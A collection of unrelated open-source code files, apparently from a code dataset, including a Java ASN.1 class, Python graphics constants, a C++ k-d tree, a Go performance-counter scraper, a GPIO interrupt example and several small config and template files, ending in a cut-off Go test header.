/**
* @author Stepan M. Mishura
* @version $Revision$
*/
package org.apache.harmony.security.asn1;
import java.io.IOException;
import java.util.Arrays;
/**
* This class represents ASN.1 Enumerated type.
*
* @see <a href="http://asn1.elibel.tm.fr/en/standards/index.htm">ASN.1</a>
*/
public final class ASN1Enumerated extends ASN1Primitive {
// default implementation
private static final ASN1Enumerated ASN1 = new ASN1Enumerated();
/**
* Constructs ASN.1 Enumerated type
*
* The constructor is provided for inheritance purposes
* when there is a need to create a custom ASN.1 Enumerated type.
* To get a default implementation it is recommended to use
* getInstance() method.
*/
public ASN1Enumerated() {
super(TAG_ENUM);
}
/**
* Returns ASN.1 Enumerated type default implementation
*
* The default implementation works with encoding
* that is represented as byte array.
*
* @return ASN.1 Enumerated type default implementation
*/
public static ASN1Enumerated getInstance() {
return ASN1;
}
public Object decode(BerInputStream in) throws IOException {
in.readEnumerated();
if (in.isVerify) {
return null;
}
return getDecodedObject(in);
}
/**
* Extracts array of bytes from BER input stream.
*
* @return array of bytes
*/
public Object getDecodedObject(BerInputStream in) throws IOException {
return Arrays.copyOfRange(in.buffer, in.contentOffset, in.contentOffset + in.length);
}
public void encodeContent(BerOutputStream out) {
out.encodeInteger();
}
public void setEncodingContent(BerOutputStream out) {
out.length = ((byte[]) out.content).length;
}
}
| {
"pile_set_name": "Github"
} |
from warnings import warnpy3k
warnpy3k("the GL module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
NULL = 0
FALSE = 0
TRUE = 1
ATTRIBSTACKDEPTH = 10
VPSTACKDEPTH = 8
MATRIXSTACKDEPTH = 32
NAMESTACKDEPTH = 1025
STARTTAG = -2
ENDTAG = -3
BLACK = 0
RED = 1
GREEN = 2
YELLOW = 3
BLUE = 4
MAGENTA = 5
CYAN = 6
WHITE = 7
PUP_CLEAR = 0
PUP_COLOR = 1
PUP_BLACK = 2
PUP_WHITE = 3
NORMALDRAW = 0x010
PUPDRAW = 0x020
OVERDRAW = 0x040
UNDERDRAW = 0x080
CURSORDRAW = 0x100
DUALDRAW = 0x200
PATTERN_16 = 16
PATTERN_32 = 32
PATTERN_64 = 64
PATTERN_16_SIZE = 16
PATTERN_32_SIZE = 64
PATTERN_64_SIZE = 256
SRC_AUTO = 0
SRC_FRONT = 1
SRC_BACK = 2
SRC_ZBUFFER = 3
SRC_PUP = 4
SRC_OVER = 5
SRC_UNDER = 6
SRC_FRAMEGRABBER = 7
BF_ZERO = 0
BF_ONE = 1
BF_DC = 2
BF_SC = 2
BF_MDC = 3
BF_MSC = 3
BF_SA = 4
BF_MSA = 5
BF_DA = 6
BF_MDA = 7
BF_MIN_SA_MDA = 8
AF_NEVER = 0
AF_LESS = 1
AF_EQUAL = 2
AF_LEQUAL = 3
AF_GREATER = 4
AF_NOTEQUAL = 5
AF_GEQUAL = 6
AF_ALWAYS = 7
ZF_NEVER = 0
ZF_LESS = 1
ZF_EQUAL = 2
ZF_LEQUAL = 3
ZF_GREATER = 4
ZF_NOTEQUAL = 5
ZF_GEQUAL = 6
ZF_ALWAYS = 7
ZSRC_DEPTH = 0
ZSRC_COLOR = 1
SMP_OFF = 0x0
SMP_ON = 0x1
SMP_SMOOTHER = 0x2
SML_OFF = 0x0
SML_ON = 0x1
SML_SMOOTHER = 0x2
SML_END_CORRECT = 0x4
PYSM_OFF = 0
PYSM_ON = 1
PYSM_SHRINK = 2
DT_OFF = 0
DT_ON = 1
PUP_NONE = 0
PUP_GREY = 0x1
PUP_BOX = 0x2
PUP_CHECK = 0x4
GLC_OLDPOLYGON = 0
GLC_ZRANGEMAP = 1
GLC_MQUEUERATE = 2
GLC_SOFTATTACH = 3
GLC_MANAGEBG = 4
GLC_SLOWMAPCOLORS = 5
GLC_INPUTCHANGEBUG = 6
GLC_NOBORDERBUG = 7
GLC_SET_VSYNC = 8
GLC_GET_VSYNC = 9
GLC_VSYNC_SLEEP = 10
GLC_COMPATRATE = 15
C16X1 = 0
C16X2 = 1
C32X1 = 2
C32X2 = 3
CCROSS = 4
FLAT = 0
GOURAUD = 1
LO_ZERO = 0x0
LO_AND = 0x1
LO_ANDR = 0x2
LO_SRC = 0x3
LO_ANDI = 0x4
LO_DST = 0x5
LO_XOR = 0x6
LO_OR = 0x7
LO_NOR = 0x8
LO_XNOR = 0x9
LO_NDST = 0xa
LO_ORR = 0xb
LO_NSRC = 0xc
LO_ORI = 0xd
LO_NAND = 0xe
LO_ONE = 0xf
INFOCUSSCRN = -2
ST_KEEP = 0
ST_ZERO = 1
ST_REPLACE = 2
ST_INCR = 3
ST_DECR = 4
ST_INVERT = 5
SF_NEVER = 0
SF_LESS = 1
SF_EQUAL = 2
SF_LEQUAL = 3
SF_GREATER = 4
SF_NOTEQUAL = 5
SF_GEQUAL = 6
SF_ALWAYS = 7
SS_OFF = 0
SS_DEPTH = 1
PYM_FILL = 1
PYM_POINT = 2
PYM_LINE = 3
PYM_HOLLOW = 4
PYM_LINE_FAST = 5
FG_OFF = 0
FG_ON = 1
FG_DEFINE = 2
FG_VTX_EXP = 2
FG_VTX_LIN = 3
FG_PIX_EXP = 4
FG_PIX_LIN = 5
FG_VTX_EXP2 = 6
FG_PIX_EXP2 = 7
PM_SHIFT = 0
PM_EXPAND = 1
PM_C0 = 2
PM_C1 = 3
PM_ADD24 = 4
PM_SIZE = 5
PM_OFFSET = 6
PM_STRIDE = 7
PM_TTOB = 8
PM_RTOL = 9
PM_ZDATA = 10
PM_WARP = 11
PM_RDX = 12
PM_RDY = 13
PM_CDX = 14
PM_CDY = 15
PM_XSTART = 16
PM_YSTART = 17
PM_VO1 = 1000
NAUTO = 0
NNORMALIZE = 1
AC_CLEAR = 0
AC_ACCUMULATE = 1
AC_CLEAR_ACCUMULATE = 2
AC_RETURN = 3
AC_MULT = 4
AC_ADD = 5
CP_OFF = 0
CP_ON = 1
CP_DEFINE = 2
SB_RESET = 0
SB_TRACK = 1
SB_HOLD = 2
RD_FREEZE = 0x00000001
RD_ALPHAONE = 0x00000002
RD_IGNORE_UNDERLAY = 0x00000004
RD_IGNORE_OVERLAY = 0x00000008
RD_IGNORE_PUP = 0x00000010
RD_OFFSCREEN = 0x00000020
GD_XPMAX = 0
GD_YPMAX = 1
GD_XMMAX = 2
GD_YMMAX = 3
GD_ZMIN = 4
GD_ZMAX = 5
GD_BITS_NORM_SNG_RED = 6
GD_BITS_NORM_SNG_GREEN = 7
GD_BITS_NORM_SNG_BLUE = 8
GD_BITS_NORM_DBL_RED = 9
GD_BITS_NORM_DBL_GREEN = 10
GD_BITS_NORM_DBL_BLUE = 11
GD_BITS_NORM_SNG_CMODE = 12
GD_BITS_NORM_DBL_CMODE = 13
GD_BITS_NORM_SNG_MMAP = 14
GD_BITS_NORM_DBL_MMAP = 15
GD_BITS_NORM_ZBUFFER = 16
GD_BITS_OVER_SNG_CMODE = 17
GD_BITS_UNDR_SNG_CMODE = 18
GD_BITS_PUP_SNG_CMODE = 19
GD_BITS_NORM_SNG_ALPHA = 21
GD_BITS_NORM_DBL_ALPHA = 22
GD_BITS_CURSOR = 23
GD_OVERUNDER_SHARED = 24
GD_BLEND = 25
GD_CIFRACT = 26
GD_CROSSHAIR_CINDEX = 27
GD_DITHER = 28
GD_LINESMOOTH_CMODE = 30
GD_LINESMOOTH_RGB = 31
GD_LOGICOP = 33
GD_NSCRNS = 35
GD_NURBS_ORDER = 36
GD_NBLINKS = 37
GD_NVERTEX_POLY = 39
GD_PATSIZE_64 = 40
GD_PNTSMOOTH_CMODE = 41
GD_PNTSMOOTH_RGB = 42
GD_PUP_TO_OVERUNDER = 43
GD_READSOURCE = 44
GD_READSOURCE_ZBUFFER = 48
GD_STEREO = 50
GD_SUBPIXEL_LINE = 51
GD_SUBPIXEL_PNT = 52
GD_SUBPIXEL_POLY = 53
GD_TRIMCURVE_ORDER = 54
GD_WSYS = 55
GD_ZDRAW_GEOM = 57
GD_ZDRAW_PIXELS = 58
GD_SCRNTYPE = 61
GD_TEXTPORT = 62
GD_NMMAPS = 63
GD_FRAMEGRABBER = 64
GD_TIMERHZ = 66
GD_DBBOX = 67
GD_AFUNCTION = 68
GD_ALPHA_OVERUNDER = 69
GD_BITS_ACBUF = 70
GD_BITS_ACBUF_HW = 71
GD_BITS_STENCIL = 72
GD_CLIPPLANES = 73
GD_FOGVERTEX = 74
GD_LIGHTING_TWOSIDE = 76
GD_POLYMODE = 77
GD_POLYSMOOTH = 78
GD_SCRBOX = 79
GD_TEXTURE = 80
GD_FOGPIXEL = 81
GD_TEXTURE_PERSP = 82
GD_MUXPIPES = 83
GD_NOLIMIT = -2
GD_WSYS_NONE = 0
GD_WSYS_4S = 1
GD_SCRNTYPE_WM = 0
GD_SCRNTYPE_NOWM = 1
N_PIXEL_TOLERANCE = 1
N_CULLING = 2
N_DISPLAY = 3
N_ERRORCHECKING = 4
N_SUBDIVISIONS = 5
N_S_STEPS = 6
N_T_STEPS = 7
N_TILES = 8
N_TMP1 = 9
N_TMP2 = 10
N_TMP3 = 11
N_TMP4 = 12
N_TMP5 = 13
N_TMP6 = 14
N_FILL = 1.0
N_OUTLINE_POLY = 2.0
N_OUTLINE_PATCH = 5.0
N_ISOLINE_S = 12.0
N_ST = 0x8
N_STW = 0xd
N_XYZ = 0x4c
N_XYZW = 0x51
N_TEX = 0x88
N_TEXW = 0x8d
N_RGBA = 0xd0
N_RGBAW = 0xd5
N_P2D = 0x8
N_P2DR = 0xd
N_V3D = 0x4c
N_V3DR = 0x51
N_T2D = 0x88
N_T2DR = 0x8d
N_C4D = 0xd0
N_C4DR = 0xd5
LMNULL = 0.0
MSINGLE = 0
MPROJECTION = 1
MVIEWING = 2
MTEXTURE = 3
MAXLIGHTS = 8
MAXRESTRICTIONS = 4
DEFMATERIAL = 0
EMISSION = 1
AMBIENT = 2
DIFFUSE = 3
SPECULAR = 4
SHININESS = 5
COLORINDEXES = 6
ALPHA = 7
DEFLIGHT = 100
LCOLOR = 101
POSITION = 102
SPOTDIRECTION = 103
SPOTLIGHT = 104
DEFLMODEL = 200
LOCALVIEWER = 201
ATTENUATION = 202
ATTENUATION2 = 203
TWOSIDE = 204
MATERIAL = 1000
BACKMATERIAL = 1001
LIGHT0 = 1100
LIGHT1 = 1101
LIGHT2 = 1102
LIGHT3 = 1103
LIGHT4 = 1104
LIGHT5 = 1105
LIGHT6 = 1106
LIGHT7 = 1107
LMODEL = 1200
LMC_COLOR = 0
LMC_EMISSION = 1
LMC_AMBIENT = 2
LMC_DIFFUSE = 3
LMC_SPECULAR = 4
LMC_AD = 5
LMC_NULL = 6
TX_MINFILTER = 0x100
TX_MAGFILTER = 0x200
TX_WRAP = 0x300
TX_WRAP_S = 0x310
TX_WRAP_T = 0x320
TX_TILE = 0x400
TX_BORDER = 0x500
TX_NULL = 0x000
TX_POINT = 0x110
TX_BILINEAR = 0x220
TX_MIPMAP = 0x120
TX_MIPMAP_POINT = 0x121
TX_MIPMAP_LINEAR = 0x122
TX_MIPMAP_BILINEAR = 0x123
TX_MIPMAP_TRILINEAR = 0x124
TX_REPEAT = 0x301
TX_CLAMP = 0x302
TX_SELECT = 0x303
TX_TEXTURE_0 = 0
TV_MODULATE = 0x101
TV_BLEND = 0x102
TV_DECAL = 0x103
TV_COLOR = 0x200
TV_NULL = 0x000
TV_ENV0 = 0
TX_S = 0
TX_T = 1
TG_OFF = 0
TG_ON = 1
TG_CONTOUR = 2
TG_LINEAR = 3
TG_SPHEREMAP = 4
TG_REFRACTMAP = 5
DGLSINK = 0
DGLLOCAL = 1
DGLTSOCKET = 2
DGL4DDN = 3
PUP_CURSOR = PUP_COLOR
FATAL = 1
WARNING = 2
ASK_CONT = 3
ASK_RESTART = 4
XMAXSCREEN = 1279
YMAXSCREEN = 1023
XMAXMEDIUM = 1023
YMAXMEDIUM = 767
XMAX170 = 645
YMAX170 = 484
XMAXPAL = 779
YMAXPAL = 574
| {
"pile_set_name": "Github"
} |
/*
* Program: Operating-system dependent routines -- Windows 2000 version
*
* Author: Mark Crispin
* Networks and Distributed Computing
* Computing & Communications
* University of Washington
* Administration Building, AG-44
* Seattle, WA 98195
* Internet: [email protected]
*
* Date: 11 April 1989
* Last Edited: 4 March 2003
*
* The IMAP toolkit provided in this Distribution is
* Copyright 1988-2003 University of Washington.
* The full text of our legal notices is contained in the file called
* CPYRIGHT, included with this Distribution.
*/
#include "tcp_nt.h" /* must be before osdep includes tcp.h */
#undef ERROR /* quell conflicting def warning */
#include "mail.h"
#include "osdep.h"
#include <stdio.h>
#include <time.h>
#include <errno.h>
#include <sys\timeb.h>
#include <fcntl.h>
#include <sys\stat.h>
#include "misc.h"
#include "mailfile.h"
#include "fs_nt.c"
#include "ftl_nt.c"
#include "nl_nt.c"
#include "yunchan.c"
#include "kerb_w2k.c"
#include "env_nt.c"
#include "ssl_w2k.c"
#include "tcp_nt.c"
| {
"pile_set_name": "Github"
} |
require('../../modules/es6.string.from-code-point');
module.exports = require('../../modules/_core').String.fromCodePoint;
| {
"pile_set_name": "Github"
} |
// -*- C++ -*- Copyright (c) Microsoft Corporation; see license.txt
#ifndef MESH_PROCESSING_LIBHH_KDTREE_H_
#define MESH_PROCESSING_LIBHH_KDTREE_H_
#include "libHh/Array.h"
#include "libHh/RangeOp.h"
#include "libHh/SGrid.h"
#include "libHh/Stack.h"
#include "libHh/Stat.h"
#include "libHh/Vec.h"
namespace hh {
// A k-D tree is a spatial structure that splits space using hyperplanes in successive dimensions.
// In this implementation, the original bounding volume is the unit cube, and the hyperplane always splits
// the current dimension at the midpoint of the current range.
// Each element is represented using a bounding box.
// When an element is entered into the tree, it is pushed down the tree until the box straddles the two child nodes.
// Large elements may be pushed down both children if the allow_duplication threshold is set.
template <typename T, int D> class Kdtree : noncopyable {
using type = Kdtree<T, D>;
public:
explicit Kdtree(int maxlevel = 8) : _maxlevel(maxlevel) { constructor_i(); }
~Kdtree() { clear(); }
void clear() { clear_i(); }
void allow_duplication(float fsize) {
if (!getenv("KD_FSIZE")) _fsize = fsize;
}
// bb0 and bb1 are copied internally
void enter(const T& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) { enter_i(id, bb0, bb1); }
void enter(T&& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) { enter_i(std::move(id), bb0, bb1); }
// search is reentrant (for HiddenLineRemoval).
// Start searching at loc (default _root) for objects whose bb intersect the one given.
// For each object found, call cbfunc with id, bb, and current location in the tree.
// cbfunc may modify the bb by shrinking it.
enum class ECallbackReturn { nothing, bbshrunk, stop };
using CBloc = int;
// ret: was_stopped
template <typename Func = ECallbackReturn(const T& id, Vec<float, D>& bb0, Vec<float, D>& bb1, CBloc floc)>
bool search(Vec<float, D>& bb0, Vec<float, D>& bb1, Func cbfunc, CBloc loc = 0) const {
return search_i(bb0, bb1, cbfunc, loc);
}
void print() const { rec_print((!_arnode.num() ? -1 : 0), 0); }
private:
const int _maxlevel; // maximum # of subdivision on each axis
float _fsize{0.f}; // ok to duplicate if average edge length < _fsize
struct Entry {
Entry() = default;
Entry(const T& id) : _id(id) {}
Entry(T&& id) noexcept : _id(std::move(id)) {}
Entry& operator=(Entry&& e) noexcept {
_id = std::move(e._id);
_bb = e._bb;
return *this;
}
T _id;
SGrid<float, 2, D> _bb; // bounding box on entry
};
struct Node {
Node() = default;
Node(int axis, float val) : _axis(axis), _val(val) {}
Stack<int> _stackei; // Entry indices
int _l{-1}; // lower-valued subtree
int _h{-1}; // higher-valued subtree
int _axis; // 0 .. D - 1
float _val;
};
Array<Entry> _arentry;
Array<Node> _arnode;
//
void constructor_i() {
assertx(_maxlevel > 0);
_fsize = getenv_float("KD_FSIZE", _fsize);
}
void clear_i() {
if (getenv_bool("KD_STATS") && _arnode.num()) {
HH_STAT(SKDdepth);
rec_depth(0, SKDdepth, 0);
}
_arentry.clear();
_arnode.clear();
}
void rec_depth(int ni, Stat& stat, int depth) const {
if (ni < 0) return;
const Node& n = _arnode[ni];
stat.enter_multiple(static_cast<float>(depth), n._stackei.height());
rec_depth(n._l, stat, depth + 1);
rec_depth(n._h, stat, depth + 1);
}
void enter_i(const T& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) {
_arentry.push(Entry(id));
enter_aux(bb0, bb1);
}
void enter_i(T&& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) {
_arentry.push(Entry(std::move(id)));
enter_aux(bb0, bb1);
}
void enter_aux(const Vec<float, D>& bb0, const Vec<float, D>& bb1) {
int ei = _arentry.num() - 1;
Entry& e = _arentry[ei];
e._bb[0] = bb0;
e._bb[1] = bb1;
Vec<float, D> aval;
fill(aval, .5f);
float avgel = 0.f;
if (_fsize) {
for_int(i, D) avgel += e._bb[1][i] - e._bb[0][i];
avgel /= D;
}
rec_enter(ei, 0, aval, 0, .5f, 0, avgel);
}
void rec_enter(int ei, int ni, Vec<float, D>& aval, int level, float inc, int axis, float avgel) {
ASSERTX(axis >= 0 && axis < D);
const Entry& e = _arentry[ei];
for (;;) {
const float val = aval[axis];
if (ni == _arnode.num()) _arnode.push(Node(axis, val));
if (!axis) {
if (++level == _maxlevel) break;
inc *= .5f;
}
bool want_l = e._bb[0][axis] <= val;
bool want_h = e._bb[1][axis] >= val;
if (want_l && want_h) { // single recursion
if (!_fsize || avgel >= inc * _fsize) break; // small enough
{
Vec<float, D> naval = aval;
naval[axis] -= inc;
if (_arnode[ni]._l < 0) _arnode[ni]._l = _arnode.num();
rec_enter(ei, _arnode[ni]._l, naval, level, inc, (axis < D - 1 ? axis + 1 : 0), avgel);
}
if (_arnode[ni]._h < 0) _arnode[ni]._h = _arnode.num();
ni = _arnode[ni]._h;
aval[axis] += inc;
} else if (want_l) {
if (_arnode[ni]._l < 0) _arnode[ni]._l = _arnode.num();
ni = _arnode[ni]._l;
aval[axis] -= inc;
} else if (want_h) {
if (_arnode[ni]._h < 0) _arnode[ni]._h = _arnode.num();
ni = _arnode[ni]._h;
aval[axis] += inc;
} else {
assertnever("");
}
axis = axis < D - 1 ? axis + 1 : 0;
}
_arnode[ni]._stackei.push(ei);
}
template <typename Func> bool search_i(Vec<float, D>& bb0, Vec<float, D>& bb1, Func cbfunc, int ni) const {
if (!_arnode.num()) return false;
int nelemvis = 0;
bool ret = rec_search(ni, ni, bb0, bb1, cbfunc, nelemvis);
if (0) { // not thread-safe
static const bool b_stats = getenv_bool("KD_STATS");
static Stat SKDsearchnel("SKDsearchnel", b_stats);
if (b_stats) SKDsearchnel.enter(nelemvis);
}
return ret;
}
// nlca == lowest common ancestor
template <typename Func>
bool rec_search(int ni, int nlca, Vec<float, D>& bb0, Vec<float, D>& bb1, Func cbfunc, int& nelemvis) const {
for (;;) {
const Node& n = _arnode[ni];
for (int ei : n._stackei) {
const Entry& e = _arentry[ei];
nelemvis++;
bool overlaps = true;
for_int(i, D) {
// SHOW(bb0[i], bb1[i], e._bb[0][i], e._bb[1][i]);
if (e._bb[0][i] >= bb1[i] || e._bb[1][i] <= bb0[i]) {
overlaps = false;
break;
}
}
if (!overlaps) continue;
if (cbfunc(e._id, bb0, bb1, nlca) == ECallbackReturn::stop) return true;
}
const int axis = n._axis;
ASSERTX(axis >= 0 && axis < D);
const float val = n._val;
bool want_l = n._l >= 0 && bb0[axis] < val;
bool want_h = n._h >= 0 && bb1[axis] > val;
if (want_l && want_h) { // single recursion
if (rec_search(n._h, nlca, bb0, bb1, cbfunc, nelemvis)) return true;
if (!(bb0[axis] < val)) return false; // test again because bb may have changed
ni = n._l;
} else if (want_l) {
if (nlca == ni) nlca = n._l;
ni = n._l;
} else if (want_h) {
if (nlca == ni) nlca = n._h;
ni = n._h;
} else {
return false;
}
}
}
void rec_print(int ni, int l) const {
for_int(i, l) std::cerr << " ";
if (ni < 0) {
std::cerr << "<nil>\n";
return;
}
const Node& n = _arnode[ni];
std::cerr << sform("partition of axis %d along %g <<\n", n._axis, n._val);
for (int ei : n._stackei) {
const Entry& e = _arentry[ei];
for_int(i, l) std::cerr << " ";
std::cerr << e._id << "\n";
}
for_int(i, l) std::cerr << " ";
std::cerr << ">>\n";
rec_print(n._l, l + 1);
rec_print(n._h, l + 1);
}
};
} // namespace hh
#endif // MESH_PROCESSING_LIBHH_KDTREE_H_
| {
"pile_set_name": "Github"
} |
// Copyright The OpenTelemetry Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// +build windows
package perfcounters
import (
"fmt"
"strconv"
"strings"
"github.com/leoluk/perflib_exporter/perflib"
"go.opentelemetry.io/collector/internal/processor/filterset"
)
const totalInstanceName = "_Total"
// PerfCounterScraper scrapes performance counter data.
type PerfCounterScraper interface {
// Initialize initializes the PerfCounterScraper so that subsequent calls
// to Scrape will return performance counter data for the specified set.
// of objects
Initialize(objects ...string) error
// Scrape returns performance data for the initialized objects.
Scrape() (PerfDataCollection, error)
}
// PerfLibScraper is an implementation of PerfCounterScraper that uses
// perflib to scrape performance counter data.
type PerfLibScraper struct {
objectIndices string
}
func (p *PerfLibScraper) Initialize(objects ...string) error {
// "Counter 009" reads perf counter names in English.
// This is always present regardless of the OS language.
nameTable := perflib.QueryNameTable("Counter 009")
// lookup object indices from name table
objectIndicesMap := map[uint32]struct{}{}
for _, name := range objects {
index := nameTable.LookupIndex(name)
if index == 0 {
return fmt.Errorf("Failed to retrieve perf counter object %q", name)
}
objectIndicesMap[index] = struct{}{}
}
// convert to a space-separated string
objectIndicesSlice := make([]string, 0, len(objectIndicesMap))
for k := range objectIndicesMap {
objectIndicesSlice = append(objectIndicesSlice, strconv.Itoa(int(k)))
}
p.objectIndices = strings.Join(objectIndicesSlice, " ")
return nil
}
func (p *PerfLibScraper) Scrape() (PerfDataCollection, error) {
objects, err := perflib.QueryPerformanceData(p.objectIndices)
if err != nil {
return nil, err
}
indexed := make(map[string]*perflib.PerfObject)
for _, obj := range objects {
indexed[obj.Name] = obj
}
return perfDataCollection{perfObject: indexed}, nil
}
// PerfDataCollection represents a collection of perf counter data.
type PerfDataCollection interface {
// GetObject returns the perf counter data associated with the specified object,
// or returns an error if no data exists for this object name.
GetObject(objectName string) (PerfDataObject, error)
}
type perfDataCollection struct {
perfObject map[string]*perflib.PerfObject
}
func (p perfDataCollection) GetObject(objectName string) (PerfDataObject, error) {
obj, ok := p.perfObject[objectName]
if !ok {
return nil, fmt.Errorf("Unable to find object %q", objectName)
}
return perfDataObject{obj}, nil
}
// PerfDataCollection represents a collection of perf counter values
// and associated instances.
type PerfDataObject interface {
// Filter filters the perf counter data to only retain data related to
// relevant instances based on the supplied parameters.
Filter(includeFS, excludeFS filterset.FilterSet, includeTotal bool)
// GetValues returns the performance counter data associated with the specified
// counters, or returns an error if any of the specified counter names do not
// exist.
GetValues(counterNames ...string) ([]*CounterValues, error)
}
type perfDataObject struct {
*perflib.PerfObject
}
func (obj perfDataObject) Filter(includeFS, excludeFS filterset.FilterSet, includeTotal bool) {
if includeFS == nil && excludeFS == nil && includeTotal {
return
}
filteredDevices := make([]*perflib.PerfInstance, 0, len(obj.Instances))
for _, device := range obj.Instances {
if includeDevice(device.Name, includeFS, excludeFS, includeTotal) {
filteredDevices = append(filteredDevices, device)
}
}
obj.Instances = filteredDevices
}
func includeDevice(deviceName string, includeFS, excludeFS filterset.FilterSet, includeTotal bool) bool {
if deviceName == totalInstanceName {
return includeTotal
}
return (includeFS == nil || includeFS.Matches(deviceName)) &&
(excludeFS == nil || !excludeFS.Matches(deviceName))
}
// CounterValues represents a set of perf counter values for a given instance.
type CounterValues struct {
InstanceName string
Values map[string]int64
}
type counterIndex struct {
index int
name string
}
func (obj perfDataObject) GetValues(counterNames ...string) ([]*CounterValues, error) {
counterIndices := make([]counterIndex, 0, len(counterNames))
for idx, counter := range obj.CounterDefs {
// "Base" values give the value of a related counter that pdh.dll uses to compute the derived
// value for this counter. We only care about raw values so ignore base values. See
// https://docs.microsoft.com/en-us/windows/win32/perfctrs/retrieving-counter-data.
if counter.IsBaseValue {
continue
}
for _, counterName := range counterNames {
if counter.Name == counterName {
counterIndices = append(counterIndices, counterIndex{index: idx, name: counter.Name})
break
}
}
}
if len(counterIndices) < len(counterNames) {
return nil, fmt.Errorf("Unable to find counters %q in object %q", missingCounterNames(counterNames, counterIndices), obj.Name)
}
values := make([]*CounterValues, len(obj.Instances))
for i, instance := range obj.Instances {
instanceValues := &CounterValues{InstanceName: instance.Name, Values: make(map[string]int64, len(counterIndices))}
for _, counter := range counterIndices {
instanceValues.Values[counter.name] = instance.Counters[counter.index].Value
}
values[i] = instanceValues
}
return values, nil
}
func missingCounterNames(counterNames []string, counterIndices []counterIndex) []string {
matchedCounters := make(map[string]struct{}, len(counterIndices))
for _, counter := range counterIndices {
matchedCounters[counter.name] = struct{}{}
}
counters := make([]string, 0, len(counterNames)-len(matchedCounters))
for _, counter := range counterNames {
if _, ok := matchedCounters[counter]; !ok {
counters = append(counters, counter)
}
}
return counters
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<DICTIONARY type="singlelanguage" lang="sk" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="dictionary.xsd">
</DICTIONARY>
| {
"pile_set_name": "Github"
} |
/**
* @module adaptive-expressions
*/
/**
* Copyright (c) Microsoft Corporation. All rights reserved.
* Licensed under the MIT License.
*/
export * from './parseErrorListener';
export * from './expressionParser';
export * from './util';
export * from './generated';
| {
"pile_set_name": "Github"
} |
/*
* Author: Brendan Le Foll
* Contributors: Alex Tereschenko <[email protected]>
* Contributors: Manivannan Sadhasivam <[email protected]>
* Copyright (c) 2014 Intel Corporation.
*
* SPDX-License-Identifier: MIT
*
* Example usage: Configures GPIO pin for interrupt and waits 30 seconds for the isr to trigger
*
*/
/* standard headers */
#include <stdlib.h>
#include <unistd.h>
/* mraa header */
#include "mraa/gpio.h"
#define GPIO_PIN 6
void
int_handler(void* args)
{
fprintf(stdout, "ISR triggered\n");
}
int
main()
{
mraa_result_t status = MRAA_SUCCESS;
mraa_gpio_context gpio;
/* initialize mraa for the platform (not needed most of the times) */
mraa_init();
//! [Interesting]
/* initialize GPIO pin */
gpio = mraa_gpio_init(GPIO_PIN);
if (gpio == NULL) {
fprintf(stderr, "Failed to initialize GPIO %d\n", GPIO_PIN);
mraa_deinit();
return EXIT_FAILURE;
}
/* set GPIO to input */
status = mraa_gpio_dir(gpio, MRAA_GPIO_IN);
if (status != MRAA_SUCCESS) {
goto err_exit;
}
/* configure ISR for GPIO */
status = mraa_gpio_isr(gpio, MRAA_GPIO_EDGE_BOTH, &int_handler, NULL);
if (status != MRAA_SUCCESS) {
goto err_exit;
}
/* wait 30 seconds isr trigger */
sleep(30);
/* close GPIO */
mraa_gpio_close(gpio);
//! [Interesting]
/* deinitialize mraa for the platform (not needed most of the times) */
mraa_deinit();
return EXIT_SUCCESS;
err_exit:
mraa_result_print(status);
/* deinitialize mraa for the platform (not needed most of the times) */
mraa_deinit();
return EXIT_FAILURE;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<vector xmlns:android="http://schemas.android.com/apk/res/android"
android:width="108dp"
android:height="108dp"
android:viewportHeight="176"
android:viewportWidth="176">
<group
android:scaleX="0.45"
android:scaleY="0.45"
android:translateX="45"
android:translateY="45">
<path
android:name="ic_app_shortcut_last_added_ic"
android:fillColor="#000"
android:pathData="M124.35,92h-16.2v16.2h-8.1V92H83.85v-8.1h16.2V67.65h8.1v16.2h16.2M128.4,55.5H79.8a8.1,8.1,0,0,0-8.1,8.1v48.6a8.1,8.1,0,0,0,8.1,8.1h48.6a8.1,8.1,0,0,0,8.1-8.1V63.6a8.1,8.1,0,0,0-8.1-8.1M63.6,71.7H55.5v56.7a8.1,8.1,0,0,0,8.1,8.1h56.7v-8.1H63.6Z" />
</group>
</vector> | {
"pile_set_name": "Github"
} |
{{$rin := RandTen}}
<div id="{{$rin}}">
<h5 class="text-muted">Log details</h5>
<div class="list-group">
<div class="list-group-item">
<h4><i class="fa fa-time"></i> {{.Time}}</h4>
</div>
{{with .Bugs}}
{{range .}}
<div class="list-group-item"><p class="text-muted pull-right"><i class="fa fa-warning"></i></p> <p>{{.Line}}</p>
<p class="reference" data-link="{{.Action}}" >{{parseLog .Action}}</p>
<p ><label class="label label-big label-warning" >{{.CTA}}</label></p>
</div>
{{end}}
{{end}}
<div class="list-group-item">
<h4><i class="fa fa-list"></i> Full log</h4>
<pre style="max-height: 800px"><code>{{printf "%s" .RawLog}}</code></pre>
</div>
</div>
<!-- <script type="text/javascript">
$maphedg = {"meth":"Pipelines section","structs":"Interface declarations' section","service": "Web service","main" : "your main function","init":"your init function","edit":"Edit Go go source"};
setTimeout(function(){
$(".reference", "#" + {{$rin}}).each(function(e,i){
if($(this).attr("data-link") != ""){
parts = $(this).attr("data-link").split(":")
if ( $(this).attr("data-link").includes("service:") ) {
$(this).html("The line is located in " + $maphedg[parts[0]] + "( " + parts[1] + ") at line: " + parts[2] + " of package " + {{.PKG}})
} else if ( !$(this).attr("data-link").includes("edit:") ){
$(this).html("The line is located in " + $maphedg[parts[0]] + " at line: " + parts[1] + " of package " + {{.PKG}})
}
}
return false;
});
}, 400);
</script> -->
</div> | {
"pile_set_name": "Github"
} |
// +build acceptance
package servicecatalog
import (
"fmt"
"testing"
tester "github.com/kyma-project/kyma/tests/console-backend-service"
"github.com/kyma-project/kyma/tests/console-backend-service/internal/client"
